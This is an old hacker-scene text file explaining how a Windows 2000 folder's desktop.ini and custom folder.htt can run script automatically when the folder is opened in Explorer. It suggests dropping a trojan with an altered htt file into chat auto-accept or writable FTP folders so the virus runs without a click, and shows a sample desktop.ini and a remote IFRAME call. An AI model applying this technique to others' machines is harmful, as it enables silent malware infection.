|
Crim3 is no longer a member of Hack3z since he found out
that the founder of this group used defacings of websites to
promote the clan. This kind of activity bothers me at great
length and I will no longer support any hacking crew. At a
certain age you discover that you can only trust yourself
What
is in this text:
---------------------
This text will explain an exploit that shows the threat of
a single folder on your comp with wright access for everyone
(like the homedir of your free FTP server") or auto a
ccepting files with your chatclient.
The exploit has only been tested on W2K machines and it
involves triggering a sent virus without the need to click
on it.
The way this is done is by exploiting the html based
folders in windows.
The problem is exactly the same as the execution of virii
in outlook based emails.
HTML
Based folders under windows:
---------------------------------
Windows constructs it's explorer screens using HTMl code.
This code is stored in the *.htt files. The global (default)
file used is desktop.htt located (for w2k) in "c:\documents
and settings\USERNAME\Application Data\Microsoft\Internet
Explorer witch is usually protected. However, you can create
a different *.htt layout file for each folder. You can do
this quickly thrue the menu. Now, all that the wizart does
is creating a new file called folder.htt and one called
desktop.ini. Other additional files are also created
depending on the type of layout you have chosen. The
desktop.ini file is placed directly within the folder itself
and the folder.htt file is placed within a subdirectory
called 'Folder settings'. All files are hidden, so make sure
you have the "show hidden files enabled" option switched
on. Now that we have are custom folder we are going to take
a look at both the folder.htt file and the desptop.ini
Desktop.ini:
------------
When opening the file it will look a lot like this:
[{5984FFE0-28D4-11CF-AE66-08002B2E1262}]
PersistMoniker=file://Folder Settings\Folder.htt
PersistMonikerPreview=%WebDir%\folder.bmp
[ExtShellFolderViews]
{5984FFE0-28D4-11CF-AE66-08002B2E1262}={5984FFE0-28D4-11CF-AE66-08002B2E1262}
[.ShellClassInfo]
ConfirmFileOp=0
We are not going to bother with the CLSID's because they
have no value for the article (although looking up the clsid
of a bat file in the registry and switching the command for
EDIT with that of RUN has some uses too *grin*) the only
thing of importance here is the PersistMoniker
The PersistMoniker= this is the file containing the layout
and here it states the folder.htt in the folder setttings
directory.
If you did check out the CLSID in the registry you would
have found the default path for the PersistMoniker
(folder.hht) as it is stated above.
The
HTML Layout: Folder.htt
---------------------------
Open the file with your favorite html editor (preferably a
plain text editor). Here you have the code that builds your
folder layout (written in the bombastic and overkill way as
only microsoft can)
The page starts with defining a load of variables that have
pretty well chosen names, so you can start changing things
to your likings a bit here.
The first large chunk of code is all dedicated to the
layout and is all javascript. I wouldn't temper with the
code unless you really, REALLY know what you are doing.
Most of this code is unrelevant (i said MOST; (the onlcick
and keypress events are handeled in here)) and describes how
the window should handle textsizes and positioning on
events like a resizing of the screen.
The fun starts with the function "function Load()", witch
is, as you may have guessed, the function that is triggered
when the folder is opened. (look for it using F3 or CTRL-F).
Whatever code you wanted added to the page do it here.
Then the actual HTML code starts
Now
that we have everything, what can we do with it?:
-----------------------------------------------------
The uses are as limited as vbscript,javascript,perl,asp,...
So there are a lot of things that you can use this for. I
use it for securing personal folders by either deleting the
entire contence of the folder.htt file (returning an empty
page when the folder is opened with explorer) or embedding a
script that triggers a virus or send me an email notifying
that someone has opened the folder. The uses can be used for
good or for bad. Take for instantance all those guys that
have auto accept enabled on their chat clients; try sending
a trojan with the desktop.ini and an altered htt file that
triggers the virus when the folder is opened? Or ad a frame
with links to standard forms used in your company. One of
the most powerfull options is embedding another file
located on the net enabeling you to use an ASP or Perl
script in the folder. for instance:
<IFRAME
src="http://intraserver/scripts/ASP/sendmail.asp?sender=?Foldername@remotehost"></IFRAME>
that's it
Best
regards
************************************************************************************
Crim3 is no longer a member of Hack3z since he found out
that the founder of this group used defacings of websites to
promote the clan. This kind of activity bothers me at great
length and I will no longer support any hacking crew. At a
certain age you discover that you can only trust yourself
************************************************************************************
Credits
Crim3 (there's nothing wrong with not knowing, not learning
bothers me)
For more info: Criminal_insect at hotmail dot com |